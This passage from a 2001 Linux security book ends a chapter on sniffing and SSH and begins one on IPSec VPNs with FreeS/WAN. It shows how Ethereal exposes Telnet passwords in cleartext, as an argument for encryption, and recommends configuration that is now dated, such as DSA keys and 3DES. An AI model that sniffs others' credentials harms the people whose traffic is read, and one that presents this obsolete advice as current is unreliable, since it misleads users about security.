host.Stop the Ethereal +packet capture by clicking Stop. +12. Remote Host:The packet capture appears in Ethereal.Attempt to locate +the SSH data packet that includes the data:password field.Recall the +easily identifiable data:password field in the Telnet packet from Figure +7.2.You should not be able to find any Application layer data in the +capture.Your screen will appear similar to Figure 7.19. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 383 +Avoiding Sniffing Attacks through Encryption • Chapter 7 383 +Figure 7.19 Attempting to Locate the SSH Login Session +13. Scroll throughout the packet capture.The only information that can be +analyzed is the Layer 1 (Physical) through Layer 4 (Transport) of the OSI +reference model.We can discover that the SSH remote host is listening +and transmitting on TCP port 22.The SSH client is using TCP port +1023.There are no passwords,usernames,or usable data.Figure 7.20 +shows the vast array of worthless TCP packets. +Figure 7.20 Packet Capture of SSH Session +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 384 +384 Chapter 7 • Avoiding Sniffing Attacks through Encryption +14. An easier way to discover useful data is to follow the TCP stream.To do +this,simply select any packet involved in this SSH connection. +15. Once a packet is selected,select the Tools menu and select Follow +TCP Stream. The contents of the TCP stream appear,as shown in +Figure 7.21. +Figure 7.21 Following a TCP Stream in SSH +16. The majority of data is encrypted using 3DES (the default symmetric +encryption for the session data).The packet sniffer has discovered no +useful or usable data by following the TCP stream. +17. Save the packet capture as secssh,and quit Ethereal. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 385 +Avoiding Sniffing Attacks through Encryption • Chapter 7 385 +Summary +In this chapter,we discussed network encryption,and why it is essential to the +security of your network.Network encryption ensures that data sent across a net- +work from one host to another is secure.If a sniffer intercepts the data,it is unus- +able because the data is encrypted.Therefore,a hacker cannot view any +usernames or passwords,and any information sent across the network,such as +confidential data,is safe. +To display the problems associated with unencrypted data transmission,you +captured unencrypted network traffic and analyzed it for security vulnerabilities. +You learned that rlogin,rsh,and Telnet are three notoriously unsafe protocols. +They do not use encryption for remote logins or any type of data transmission. +You discovered that Telnet sends each password character as a separate packet.If +you continue to scroll down the packet capture and view each Telnet data packet, +you will discover the password.An easier way to discover the Telnet password is +to follow the TCP stream.The username and password are displayed in clear text, +as well as all of the data contained in the transmission. +To solve this problem,you learned how to encrypt network traffic with +OpenSSH.OpenSSH (www.openssh.org) is an open source program that encrypts +all traffic between hosts.It is a secure replacement for common Internet programs +used for remote connectivity,such as Telnet,rlogin,and FTP.Because it encrypts all +traffic,it always hides usernames and passwords used for remote logins.After the +login occurs,it continues to encrypt all data traffic between the hosts. +You implemented secure data transmissions using OpenSSH over an unse- +cured network.This required ensuring that OpenSSH was installed on two dif- +ferent hosts.One system was the SSH remote host,and the other was the SSH +client.SSH provides authentication by creating a private/public key pair for a +user by using the ssh-keygen command.In SSH 2.0,the private DSA key is +stored in the $HOME/.ssh/id_dsa file.The public key should be copied and +stored in the $HOME/.ssh/authorized_keys2 file on the remote system.The +authorized_keys2 file contains one public key per line.SSH 2.0 sessions are +encrypted using ArcFour,CAST128,Blowfish,or 3DES.Data integrity is ensured +using hmac-md5 and hmac-sha1.SSH 2.0 is superior and should be used when- +ever possible. +Last,you captured an SSH session and analyzed it for security vulnerabilities. +The only information that could be analyzed was the Layer 1 (the Physical layer) +through Layer 4 (the Transport layer) of the OSI reference model.The login data +was unreadable,and the majority of data was encrypted using 3DES (the default +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 386 +386 Chapter 7 • Avoiding Sniffing Attacks through Encryption +symmetric encryption for the session data).The packet sniffer discovered no +useful or usable data by following the TCP stream.As you can see,OpenSSH is +essential and should be a permanent replacement for Telnet,rsh,and rlogin. +Solutions Fast Track +Understanding Network Encryption +(cid:59) Network encryption is used for any data transfer that requires confiden- +tiality.Encryption ensures that data sent across a network from one host +to another is unreadable to a third party. +(cid:59) Rlogin,remote shell (rsh),and Telnet are three notoriously unsafe proto- +cols.They do not use encryption for remote logins or any type of data +transmission.If a malicious hacker captured this traffic,it would display +the data,such as usernames or any passwords,in clear text. +Capturing and Analyzing +Unencrypted Network Traffic +(cid:59) You can capture packets during a Telnet login session using the open +source packet sniffer Ethereal.Once the session is captured,you can +locate the Telnet data packet that includes the data:password field. +(cid:59) Another way to discover the Telnet password is to follow the TCP +stream.To do this,simply select any packet involved in this Telnet con- +nection,then select the Tools menu,and select Follow TCP Stream in +Ethereal.The username and password are displayed in clear text. +Using OpenSSH to Encrypt +Network Traffic between Two Hosts +(cid:59) OpenSSH encrypts all traffic between two hosts using Secure Shell +(SSH).It is a secure replacement for common Internet programs used +for remote connectivity,such as Telnet,rlogin,and rsh. +(cid:59) It features strong encryption using Triple Data Encryption Standard +(3DES) and Blowfish,as well as strong authentication using public keys, +one-time passwords (OTPs),and Kerberos Authentication. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 387 +Avoiding Sniffing Attacks through Encryption • Chapter 7 387 +Installing and Configuring Secure +Shell on Two Network Hosts +(cid:59) OpenSSH implementations are significantly different between operating +systems.The OpenSSH Portability Team uses the OpenBSD OpenSSH +code to develop portable versions for other operating systems.You must +make sure a specific version exists for your operating system at +www.openssh.org. +(cid:59) The method for implementing SSH combines similar r-command con- +cepts with a private and public key method. +(cid:59) SSH can create a DSA private/public key pair for a user by using the +ssh-keygen -d command.In SSH 2.0,the private DSA key is placed +in the $HOME/.ssh/id_dsa file.The public key is placed in the +$HOME/.ssh/id_dsa.pub file.The public key should be renamed and +copied to the $HOME/.ssh/authorized_keys2 file on the remote system. +Implementing SSH to Secure Data +Transmissions over an Insecure Network +(cid:59) Both hosts must have SSH installed to transmit data securely,such as the +SSH implementation. +(cid:59) You must first use ssh-keygen to create a private and public key on each +host using either RSA or DSA authentication.Then,distribute the public +key to the host with which you wish to communicate,and vice versa. +(cid:59) To establish the connection using SSH,the ssh command is used in the +format ssh remotehost.Remotehost is the name of the host you will con- +nect to using SSH. +Capturing and Analyzing Encrypted Network Traffic +(cid:59) You can capture packets between two hosts using an SSH session to +determine if the data is secure.For example,you can attempt to identify +any login data,as well as any session data. +(cid:59) Using Ethereal,or any packet-capturing program,you will find that all +Application layer data is encrypted.No passwords,usernames,or usable +data is displayed.Following a TCP stream is fruitless.Only the TCP +ports are displayed in the capture. +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 388 +388 Chapter 7 • Avoiding Sniffing Attacks through Encryption +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: I am receiving warning messages regarding key lengths.What do these mes- +sages mean,and how can I prevent them? +A:The key-length warning messages you see are sent by OpenSSH when it +encounters certain defective RSA or DSA keys that are sometimes generated +by a bug in the ssh-keygen program (in commercial SSH).These defective +keys are Pubkey Authentication keys whose Most Significant Bit (MSB) is +not set.Thus,these keys are frequently half as long as advertised (they adver- +tise as full length).The warning messages alert you that OpenSSH has +detected this type of defective key. +You can prevent this type of warning message by editing the +known_hosts file.Find the entry listing the incorrect key length value +(often 1024),and change the entry to list the correct key length value +(generally 1023). +Another solution is to simply create new keys.This approach is preferable +because even after correction,the modified keys are generally less secure. +Q:Why did I lose support for SSH2 after I upgraded to OpenSSH 2.5.1? +A:When you upgrade OpenSSH versions,your sshd_config or ssh_config +programs may incur some modifications.It is advisable to verify the settings +in these files whenever you upgrade OpenSSH.If you are upgrading from +OpenSSH 2.3.0 to 2.5.1,you can add: +HostKey /etc/ssh_host_dsa_key +to your sshd_config file.This modification will retain your SSH2 support. +Q:Why does it take so long for SSH to connect with Linux glibc 2.1? +A:The Red Hat Linux 6.1 implementation of glibc offers a universal “IPv6 or +IPv4”resolution capability.Although this feature can be convenient,it +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 389 +Avoiding Sniffing Attacks through Encryption • Chapter 7 389 +requires more time to resolve IP addresses from domain names because it +must make the IP version determination on a case-by-case basis. +To speed up resolution,you can use the --with-ipv4-default configure +option.When you enter this option,OpenSSH will resolve only IPv4 +addresses.Similarly,you can use the -6 option to instruct OpenSSH to resolve +only IPv6 addresses. +Q:Why does SSHD or “configure”sometimes state they do not have support for +RSA or DSA? +A:Your OpenSSH libraries must be constructed to include this support.You can +verify that RSA and DSA are supported in your program files by checking +internally or by using the RSAref. +Q:The configure file is missing from my distribution,and the make command +fails when executed.Why? +A: If you receive a missing separator error when the make command fails,or +you are missing the configure file in your downloaded tar.gz,you probably +have the same problem:You may be trying to compile the OpenBSD distri- +bution of OpenSSH on a platform other than the one you used to download +it.You must use a portable version of OpenSSH in order to do this without +error. +Q: OpenSSH hangs when I exit SSH.Why? +A: Linux and HP-UX systems have been noted to hang when exiting +OpenSSH.This bug appears in current OpenSSH versions,and occurs pri- +marily when a background process is active.You can enter sleep 20&exit to +test for this problem.The man page for your shell should list an option you +can use to send a HUP signal to active processes upon exit.Bash users can +use the following entry in either /etc/bashrc or ~/.bashrc: +shopt -s huponexit +www.syngress.com + +138_linux_07 6/20/01 9:44 AM Page 390 + +138_linux_08 6/20/01 9:46 AM Page 391 +Chapter 8 +Creating Virtual +Private Networks +Solutions in this chapter: +(cid:2) Secure Tunneling with VPNs +(cid:2) Explaining the IP Security Architecture +(cid:2) Creating a VPN by Using FreeS/WAN +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +391 + +138_linux_08 6/20/01 9:46 AM Page 392 +392 Chapter 8 • Creating Virtual Private Networks +Introduction +In previous chapters,you have discovered how you can enhance authentication +by using third-party open source software,such as Kerberos,“one-time passwords +in everything”(OPIE),and the public-key cryptography methods of Open +Secure Shell (OpenSSH).You also learned how to employ encryption between +hosts by using the application-layer security methods of OpenSSH.In this +chapter,you will go a step further to deploy secure authentication and strong +encryption at the network layer to establish network security by using virtual pri- +vate networks (VPNs).VPNs offer certain advantages over other network security +protocols,as you will find in this chapter.You will learn about the many solutions +provided by VPNs in today’s Internet workplace,such as providing secure trans- +missions between two hosts,routers,or both.We explain the Internet Protocol +Security Architecture (IPSec),which is quickly becoming the standard protocol +for VPNs.You will finish up the chapter by creating your own VPN by using Free +Secure Wide Area Network (FreeS/WAN). +Secure Tunneling with VPNs +A VPN provides a private data network over public telecommunication infrastruc- +tures,such as the Internet.It provides both secure authentication and encryption.It +creates a data “tunnel”between devices so that all data transmitted between the +devices is secure,regardless of what programs the devices are running.After a secure +tunnel is established,data can be transmitted securely between the hosts. +Three basic types of VPN solutions exist:telecommuter,router-to-router,and +host-to-host.A telecommuter VPN can be used to securely connect a host to a +network from any Internet connection and is ideal for traveling workers.A +router-to-router VPN is used to create a secure transmission tunnel between two +networks,such as two company sites in different locations.A host-to-host VPN +creates a secure transmission tunnel between any two hosts.A VPN implementa- +tion named FreeS/WAN,which you will implement in this chapter,can provide +all three solutions. +Telecommuter VPN Solution +Telecommuters can use VPNs to log in to their company network from home or +from the road.Any location with Internet access can be used.The telecommuter +must ensure that the laptop,desktop,or handheld system contains VPN client +software and the address of the company’s VPN server.The telecommuter then +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 393 +Creating Virtual Private Networks • Chapter 8 393 +accesses the Internet through normal access methods,such as a dial-up,a Digital +Subscriber Line (DSL),or a cable network connection.After access to the +Internet is achieved,the telecommuter opens a VPN client to log on to the com- +pany VPN server—once logged on,the telecommuter has access to the company +network.She receives the same user rights and privileges on the company net- +work as if she were physically logged in at a company workstation.If the +telecommuter has a fast Internet connection,she will be unable to tell the differ- +ence between physically working at the company location and working through +the VPN.The VPN concept is shown in Figure 8.1. +Figure 8.1 Telecommuting Using a VPN +File Server Workstation +Internet Company Ethernet +Laptop Computer +Company VPN Server +(VPN Client) +Customer Database +After the VPN tunnel has been established,the telecommuter can run any +application as if he were at a company workstation,provided he has the appro- +priate client.All of these applications will run over the tunnel,and the applica- +tions themselves are not required to be secure,because they are transmitted +through the VPN tunnel.The VPN tunnel encrypts the data,so any captured data +(regardless of the program that generated that data) will be useless.The tunnel +concept is displayed in Figure 8.2. +Figure 8.2 Secure Transmission of Data across the Internet Using a +VPN Tunnel +Internet +Secure VPN Tunnel +Laptop Computer +Company VPN Server +(VPN Client) +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 394 +394 Chapter 8 • Creating Virtual Private Networks +VPNs can also be used by corporate partners.For instance,the customer +database displayed in Figure 8.1 could be available for a sales team at another +company.The sales team could receive accounts on your network with access to +the customer database only. +Router-to-Router VPN Solution +VPNs are a cost-effective way to create a wide area network (WAN) for con- +necting company satellite offices and corporate offices.In the past,a company +leased expensive dedicated lines from phone companies to connect each location. +VPNs allow companies to create a router-to-router VPN over the Internet instead. +In order to implement a VPN,you must ensure that each gateway router to +your network supports the VPN implementation you choose at each location. +These routers are located on the edge of your network and are the end-to-end +points for your VPN tunnel.They are responsible for encapsulating the traffic as it +leaves the network and removing the capsule as it arrives between your satellite +and corporate offices.All router vendors offer VPN functionality.For instance, +Cisco offers the Cisco 1600 series of routers that offer a VPN option. +VPNs can connect your corporate networks for a fraction of the cost of +leasing dedicated lines.A corporate WAN using VPN-enabled routers is displayed +in Figure 8.3. +Figure 8.3 Creating a Corporate Router-to-Router VPN +File Server Workstation File Server Workstation +Internet +New York Ethernet Secure VPN Tunnel Tokyo Ethernet +VPN-Enabled Router VPN-Enabled Router +(Tunnel Endpoint) (Tunnel Endpoint) +Accounting Database Customer Database +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 395 +Creating Virtual Private Networks • Chapter 8 395 +Host-to-Host VPN Solution +VPNs can also securely connect two hosts over the Internet or any unsecured +network.Each host is the tunnel endpoint.The only difference is that a separate +network does not exist on the other side of the hosts,so no gateway is required +with IP forwarding enabled.If you can create a tunnel between two hosts,you +can expand your knowledge in an enterprise environment to accommodate both +telecommuter and router-to-router VPN solutions.The host-to-host VPN solu- +tion is shown in Figure 8.4. +Figure 8.4 Creating a Host-to-Host VPN +Internet/ +VPN Host VPN Host +Unsecured Network +Secure VPN Tunnel +Tunneling Protocols +As mentioned previously,a “tunnel”is created between VPN hosts to ensure that +all traffic between them is secure.The tunnel is created with a tunneling pro- +tocol.These protocols are responsible for encapsulating a data packet before a +host transmits it.After the data is encapsulated,it is sent over the Internet until it +arrives at its destination.When it arrives,the capsule is removed,and the data is +processed by the destination host. +IP tunneling protocols are particularly powerful because they can transmit +foreign protocols over the Internet.For instance,a Novell NetWare host can send +an Internetwork Packet Exchange/Sequenced Packet Exchange (IPX/SPX) +packet over the Internet by encapsulating it in an IP packet,then transmitting it +using Transmission Control Protocol/IP (TCP/IP).When it arrives at its destina- +tion,the IP packet is stripped off,and the IPX/SPX packet is processed. +The next generation protocol,IPv6,has a test bed called the 6bone +(www.6bone.net).The 6bone is a virtual network that uses IPv6-over-IPv4 tun- +neling.The IPv6 networks,called islands, are connected over the Internet using +IPv4 tunnels.The IPv6 packets are encapsulated by an IPv4 packet and sent over +the Internet.When they arrive at the destination,the IPv4 packet is removed,and +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 396 +396 Chapter 8 • Creating Virtual Private Networks +the IPv6 packet is processed on the IPv6 network.The leading VPN tunneling +protocols are listed in Table 8.1. +Table 8.1 The Leading VPN Tunneling Protocols +Tunneling Protocol Description +Point-to-Point Tunneling Tunneling protocol developed by Microsoft that +Protocol (PPTP) is built into the Windows operating system. It is +an extension of the Point-to-Point Protocol (PPP) +and uses PPP mechanisms for authentication, +encryption, and compression. +PPTP uses Microsoft Point-to-Point Encryption +(MPPE) for encrypting the PPP frames. +Layer 2 Forwarding (L2F) Tunneling protocol developed by Cisco that is +similar to PPTP. +Layer 2 Tunneling Protocol Tunneling protocol that combines PPTP and L2F. +(L2TP) L2TP uses the best mechanisms of each. L2TP is +already built into Microsoft Windows 2000 +Server and Cisco Internet Operating System (IOS) +software for networking and end-to-end hard- +ware products. Like PPTP, L2TP requires that ISPs +support it so that it can be used for router-to- +router VPNs. This protocol is used in Cisco’s +“Access VPN” service. +L2TP uses IPSec for encryption. +L2TP will eventually become the industry +standard for VPNs. +Explaining the IP Security Architecture +IP has been a low-cost,efficient protocol for several decades.However,it has +always suffered from security vulnerabilities that have required users and busi- +nesses to use other methods to ensure data confidentiality across the Internet.A +new protocol,IP Security Architecture (IPSec),is designed to add authentication +and encryption to IP when needed. +IPSec is an Internet Engineering Task Force (IETF) security protocol that is +becoming a standard component of VPN tunneling protocols.As the name sug- +gests,it was designed for IP,and IPSec has gained wide industry support.For +instance,Cisco already supports IPSec in its routers and is one of the leading sup- +porters for IPSec standardization.IPSec is currently a proposed standard (Request +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 397 +Creating Virtual Private Networks • Chapter 8 397 +for Comments [RFC] 2401) within the IETF.The IPSec charter Web page, +shown in Figure 8.5,is maintained by the IETF IPSec working group.The URL +is www.ietf.org/html.charters/ipsec-charter.html.This site is ideal for monitoring +the progress of IPSec and the numerous implementations for the IPSec standard. +Figure 8.5 IETF IPSec Charter +IPSec provides secure authentication and encryption over a network by +securing all packets at Layer 3,the network layer,of the Open System +Interconnection (OSI) reference model.Layer 3 security is significant because +Layer 3 is responsible for IP addressing and routing over the Internet.Security at +this layer ensures that everything on the network is secure. +NOTE +Another benefit of IPSec is that it already supports the next generation +Internet Protocol, IP version 6 (IPv6). IPSec will be a requirement for IPv6 +implementation. +Layer 3 security is in contrast to methods that provide only encryption and +authentication to higher-level protocols,such as SSH (you learned about SSH in +the last chapter). +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 398 +398 Chapter 8 • Creating Virtual Private Networks +Programs such as SSH for remote login,Secure Hypertext Transfer Protocol +(SHTTP) and Secure Socket Layer (SSL) for Web applications,and Pretty Good +Privacy (PGP) for e-mail secure data between two applications using Layer 4 +mechanisms.This method works extremely well but is limited because only the +data between the program’s associated ports is encrypted.IPSec secures all data, +regardless of the program running between the hosts.To demonstrate the limita- +tions of security protocols such as SSH,SHTTP,and SSL,recall the implementa- +tion of SSH in the last chapter.First,you captured packets that were +unencrypted,shown in Figure 8.6. +Figure 8.6 Unencrypted Packets +Next,you captured packets between two SSH hosts that used encryption.The +application layer data was encrypted,but the Layer 4 (the transport layer) port +numbers could be viewed,so you could easily determine the service running.You +discovered that the SSH remote host listens and transmits on TCP port 22.The +SSH client used TCP port 1023.Figure 8.7 shows the captured SSH traffic. +SHTTP and SSL traffic displays in a similar manner when captured,except dif- +ferent port numbers are displayed. +IPSec is different from SSH and other application-based encryption protocols +because an IPsec tunnel encrypts data at the Layer 3 (the network layer) so that no +transport layer (Layer 4) data is displayed,which reduces security vulnerabilities. +Figure 8.8 displays a packet capture of IPSec packets transmitted through a tunnel. +Note that the amount of useful information is significantly reduced.For instance, +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 399 +Creating Virtual Private Networks • Chapter 8 399 +Figure 8.7 Packet Capture of SSH Session Displaying TCP Port Data +Figure 8.8 Packet Capture of IPSec Session +all transport layer data in the figure is encrypted by an Encapsulating Security +Payload (ESP) header,which renders the packet and its contents useless if captured +by a hacker.ESP encrypts the packet at the network layer,so even the port infor- +mation is encrypted.So as you can see,this is an improvement over application- +based encryption protocols,such as SSH,which display the transport-layer data. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 400 +400 Chapter 8 • Creating Virtual Private Networks +The packets captured in Figure 8.8 are from a VPN tunnel using IPsec.This +tunnel was set up between two hosts (a host-to-host solution),and the tunnel +endpoints encrypted all traffic between the two hosts,regardless of the applications +running between them.IPsec is used by many VPN implementations.You will +learn about these implementations and how they use IPsec in the next section. +Using IPSec with a VPN Tunneling Protocol +IPSec is used as an authentication and encryption standard for VPNs.As you +learned in Table 8.1,several tunneling protocols exist,such as PPTP and L2TP. +You learned that both PPTP and L2TP are extensions of PPP.One of IPSec’s +functions within L2TP is to encapsulate the PPP data and encrypt the data at the +network layer (Layer 3) of the OSI model.Figures 8.9 through 8.11 display a +graphic that displays how IPSec encapsulation works with one type of L2TP +implementation. +First of all,a PPP frame is created.This frame contains the IP packet created +from the TCP/IP stack on your system with a PPP header attached.It contains +data from your system that would normally be sent across the wire.The PPP +frame is displayed in Figure 8.9. +Figure 8.9 Starting Out with a PPP Frame +PPP PPP Payload +Header (IP Packet) +Next,the L2TP and User Datagram Protocol (UDP) headers are added to +the PPP frame,as shown in Figure 8.10. +Figure 8.10 Adding an L2TP and UDP Header to a PPP Frame +UDP L2TP PPP PPP Payload +Header Header Header (IP Packet) +Last,the IPSec encapsulation is implemented.IPSec adds an IPSec ESP +header and trailer.It also adds an IPSec Authentication trailer for message authen- +tication and integrity.The L2TP packet is encrypted by IPSec,which uses the +encryption keys that were generated form the authentication process. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 401 +Creating Virtual Private Networks • Chapter 8 401 +During this process,the standard IP header is added to the packet.The IP +source address is the VPN client (which is sending this packet).The IP destination +address is the VPN server that will receive this packet.The IPSec packet is dis- +played in Figure 8.11. +Figure 8.11 Adding IPSec Mechanisms to an L2TP Packet +IPSec Encrypted +IPSec IPSec IPSec +IP UDP L2TP PPP PPP Payload +ESP ESP Auth +Header Header Header Header (IP Packet) +Header Trailer Trailer +When the packet arrives at the VPN server,the VPN server will strip the IP, +IPSec,UDP,L2TP,and PPP headers from the packet to discover the original data +sent from the VPN client. +Internet Key Exchange Protocol +IPSec is often used in conjunction with the Internet Key Exchange (IKE) pro- +tocol.IKE is a key management protocol standard that enhances IPSec,such as +providing a simpler IPSec configuration,flexibility,and more features.IKE is not +required to run IPSec,but it enhances the standard. +IKE is a hybrid protocol.It implements three security protocols: +(cid:2) Internet Security Association and Key Management Protocol (ISAKMP) +(cid:2) Oakley key exchange +(cid:2) Skeme key exchange +IKE uses the ISAKMP framework to run the Oakley and Skeme key +exchange mechanisms.The combination of these three security protocols pro- +vides authentication using digital signature and public key encryption. +IKE allows dynamic authentication of hosts,provides anti-replay services,and +can change encryption keys during an IPSec session.It allows IPSec to operate +without requiring an administrator to manually configure all of the IPSec secu- +rity parameters between two hosts,and it negotiates IPSec security associations +(SAs) automatically.IKE also allows Certification Authority (CA) support and +permits lifetime specifications from IPSec security associations. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 402 +402 Chapter 8 • Creating Virtual Private Networks +To learn more about IKE,read the RFC 2409 proposed standard on the +Internet at www.ietf.org/rfc/rfc2409.txt. +Creating a VPN by Using FreeS/WAN +Free Secure WAN (FreeS/WAN) is a Linux VPN implementation that uses IPSec +and IKE.IPSec and IKE were discussed in the previous sections and are used to +provide secure authentication and encryption of data between two hosts at Layer +3 (network layer) of the OSI model.FreeS/WAN creates a secure VPN tunnel +between the hosts.The FreeS/WAN project goal is to provide freely available +source code to promote IPSec and allow it to run on many different machines.It +also avoids export restrictions and attempts to interoperate with all VPNs that use +IPSec.The FreeS/WAN project is based at www.freeswan.org/intro.html (shown +in Figure 8.12). +Figure 8.12 Home of the FreeS/WAN Project +Because FreeS/WAN uses IPSec,it can be implemented on any system that +performs IP networking.This includes routers,PCs,laptops,firewalls,and applica- +tion servers such as Web,mail,and database servers.FreeS/WAN uses three IPSec +protocols,shown in Table 8.2. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 403 +Creating Virtual Private Networks • Chapter 8 403 +Table 8.2 IPSec Protocols Used in FreeS/WAN +Protocol Description +Authentication Header (AH) Performs authentication at the packet level. +Encapsulating Security Performs encryption as well as authentication. +Payload (ESP) +Internet Key Exchange (IKE) Performs key exchanges and connection +parameter negotiation. +Damage & Defense… +The Need for VPN Interoperability +Interoperability is a major concern with S/WAN and VPNs in general. +Currently, almost all firewalls and security software available today +offers IPSec support. It is the goal of S/WAN developers for all S/WAN +implementations to interoperate, no matter what device they are +installed on. This goal is shared by many manufacturers and is spear- +headed by the VPN Consortium (VPNC). The VPNC is an international +trade association for manufacturers in the VPN market. +The VPNC goal is to show manufacturers where their VPN products +interoperate, so that the manufacturers can more easily provide inter- +operability with other VPN implementations. They also publicize and +provide support for testing events for VPN interoperability. By providing +a forum for all VPN manufacturers to communicate, the Internet may +eventually use one VPN standard, and all vendor VPN products may be +able to communicate with one another. +To learn more about VPN interoperability efforts, visit the VPNC +Web site at www.vpnc.org. +These IPSec protocols are implemented in FreeS/WAN by using two +programs and a variety of scripts,as shown in Table 8.3. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 404 +404 Chapter 8 • Creating Virtual Private Networks +Table 8.3 FreeS/WAN Implementation of IPSec Protocols +FreeS/WAN +Implementation Description +Kernel IPSec (KLIPS) Performs AH and ESP functions. It also handles +packets within the Linux kernel. +Pluto Performs IKE. Pluto is an IKE daemon. +Variety of scripts Offers a FreeS/WAN interface for the administrator. +NOTE +In order to add IPSec to the system, FreeS/WAN installs IPSec into the +Linux IPv4 TCP/IP stack. This step is necessary because IPSec is not +required for IPv4. However, it is required for IPv6. +In the following sections,you will download,install,and configure +FreeS/WAN.After you install it,you will capture a variety of unencrypted +application packets,then implement FreeS/WAN and ensure that all packets +transmitted through the VPN are secure. +Downloading and Unpacking FreeS/WAN +FreeS/WAN is not included with all Red Hat Linux distributions.Many coun- +tries have restriction laws that forbid the export or import of strong encryption. +Therefore,your version of Red Hat Linux most likely does not include +FreeS/WAN. +These installation instructions are written for freeswan-1.9 (this tarball is +available on the CD accompanying this book [freeswan-1.9.tar.gz ]) and Red Hat +Linux 7.0 using the linux-2.2.16 kernel,which will be upgraded to the linux- +2.4.3 kernel (this kernel is also included on the CD [linux-2.4.3.tar.gz]).A +custom installation of Linux with “everything”was installed. +The program is downloaded as a TAR file that contains the source code and +documentation,as well as any patches.To download and install FreeS/WAN +complete the following steps: +1. Log in as root. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 405 +Creating Virtual Private Networks • Chapter 8 405 +2. Access the FreeS/WAN download site at www.freeswan.org/ +download.html.You can also obtain the necessary files from the CD +accompanying this book. +3. Scroll down to the Latest Release section,as shown in Figure 8.13. +Figure 8.13 Accessing the Latest Release of FreeS/WAN +SECURITY ALERT! +Do not download the installation files from the “Today’s Snapshot” sec- +tion. The snapshots are experimental versions, and you may have diffi- +culty implementing them. The “Latest Release” versions have been tested +on Red Hat Linux and have a better change of working correctly on your +system. +4. In this example,the latest release can be downloaded from Europe via +FTP by selecting the ftp.xs4all.nl link.Select the corresponding link in +your browser. +5. At the FTP site,view the FreeS/WAN files that are listed.For instance, +the Europe FTP site is shown in Figure 8.14.You would need to down- +load at least the freeswan-1.9.tar.gz file (your version may differ) to your +system.Although not all the files are required to run FreeS/WAN,you +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 406 +406 Chapter 8 • Creating Virtual Private Networks +may find them useful.For instance,the RFCs that FreeS/WAN is based +are included in the RFCs.tar.gz file.The files you can download are as +follows (these files are also located on the CD accompanying this book): +(cid:2) RFCs.tar.gz +(cid:2) freeswan-1.9.tar.gz +(cid:2) freeswan-1.9.tar.gz.sig +(cid:2) freeswan-sigkey.asc +Figure 8.14 Downloading the FreeS/WAN TAR File(s) +NOTE +You can also access the freeswan-1.9.tar.gz tarball from the supple- +mental CD included with this book and copy it to your /root directory. +This lab is written for version 1.9, which is the version on the CD. +6. Download the FreeS/WAN file(s) to your /root directory. +7. Access the download directory by entering. +cd /root +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 407 +Creating Virtual Private Networks • Chapter 8 407 +NOTE +If you have already compiled your kernel in the past (you have a .config +file in your /usr/src/linux directory), then download and unpack the files +in your /usr/src/ directory (but not in the linux directory). +8. The filename will look like this:freeswan-1.9.tar.gz. +9. In the /root directory,unpack the image by entering: +tar -zxvf freeswan-1.9.tar.gz +This will create a /root/freeswan-1.9 directory. +Compiling the Kernel to Run FreeS/WAN +Now you need to configure the Linux kernel to run FreeS/WAN.The +FreeS/WAN code must be added to the kernel.Before you configure +FreeS/WAN,you must configure,build,and test a system kernel.This must be +done before installing FreeS/WAN because the program uses the results of com- +piled kernel to make the necessary modifications. +The following tools must be installed before you begin the kernel configura- +tion for FreeS/WAN.If you completed a “Custom”Red Hat Linux installation +with “everything”installed,you can skip this warning—all of the required Red +Hat Package Manager (RPM) packages are already installed (you may need to +update them later in this section). +To check if an RPM is installed,enter rpm -qa | grep rpm_name. To +install an RPM,enter rpm -i rpm_name_version.Access the RPMs from the +Red Hat installation CD /RedHat/RPMS directory,as shown in the following +Kernel source code item: +1. Kernel source code The Linux kernel source RPM must be installed +to configure the kernel.To find out if it is installed,enter rpm -qa | +grep kernel-source.If you do not receive a reply,access your Red Hat +installation CD and install the kernel-source and kernel-headers RPMs +(your versions may vary) from the /RedHat/RPMS directory. +2. Tools A GNU C compiler RPM must be installed—either gcc or egcs +works.Development tools,including make and patch must be installed. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 408 +408 Chapter 8 • Creating Virtual Private Networks +3. Libraries The glibc,GMP (required for Pluto’s public key calculations), +and ncurses (if you use menuconfig) RPMs must be installed. +NOTE +The following demonstration is safe and will upgrade your Linux kernel. +You will always have the old kernel on your system, so you can switch +back if a problem arises. Recompiling the kernel is required to support +many new devices in Linux. +If you have already compiled your kernel in the past (you have a +.config file in your /usr/src/linux directory), then you can skip this section. +Go to the “Configuring FreeS/WAN” section. Please note that you will +NOT have to reconfigure the FreeS/WAN Makefile. +4. Revisit www.freeswan.org/download.html (shown in Figure 8.13) to +determine if your system’s Red Hat Linux version and kernel are +supported. +5. For this demonstration,the Linux kernel will be upgraded to linux- +2.4.3,and then FreeS/WAN will be compiled. +6. Access the kernel source code from the anonymous FTP site located at +ftp://ftp.kernel.org/pub/linux/kernel/. +7. Open the v2.4 directory (or the latest supported by FreeS/WAN) to +access the Linux 2.4 kernel versions.Locate the linux-2.4.3.tar.gz file.It +is located in the middle of the screen,shown in Figure 8.15. +NOTE +You can also access the 